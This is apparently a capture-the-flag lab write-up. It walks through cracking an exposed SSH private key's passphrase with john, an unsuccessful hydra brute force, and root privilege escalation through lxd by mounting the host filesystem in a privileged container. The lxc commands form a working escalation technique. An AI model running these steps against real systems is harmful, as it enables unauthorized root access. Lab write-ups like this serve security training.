When we browse the site a little, we find the Uploads page. It's not hidden.
Dict.lst is a wordlist. There's a story in the manifest.txt file too :D
download dict.lst
When we browse the site a little more, we see the name John in the html code of the site.
At this stage, when I ssh bruteforce with hydra, I did not get any results. Let's continue scanning.
You can see the file named /secret/ in the dirb scan.
When we go to the file, we see id_rsa.
Let's download the rsa key and find the passphrase with dict.lst.
ssh2john secretKey > secret.hash
john –wordlist=dict.txt secret.hash
Now we can log in to ssh.
When we run the “id” command, we notice something strange.
Upon further research, I found lxd is a linux container manager, and can be used to mount the root folder on the host machine.
Let's send the file we built to John.
And run the following commands on John's machine.
lxc image import ./alpine.tar.gz --alias myimage
This command imports a local Alpine Linux image (named "alpine.tar.gz" as a file) and assigns it the alias "myimage." This makes it easier to refer to this image later.
This command creates a container named "ignite" and configures it to use the "myimage" image as its base. Additionally, it sets the configuration option security.privileged=true, which means the container will run in "privileged" mode, giving it more permissions and control over the host system.
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
This command adds a disk device named "mydevice" to the "ignite" container. This device is connected to the host system's root file system (source=/) and mounts it inside the container at the /mnt/root path. The recursive=true option ensures that all files and directories under the source directory are transferred into the container.
lxc start ignite
This command starts the "ignite" container, allowing the operating system inside the container to begin running.
lxc exec ignite /bin/sh
This command starts a /bin/sh shell inside the "ignite" container, allowing you to enter the container and run commands within it.
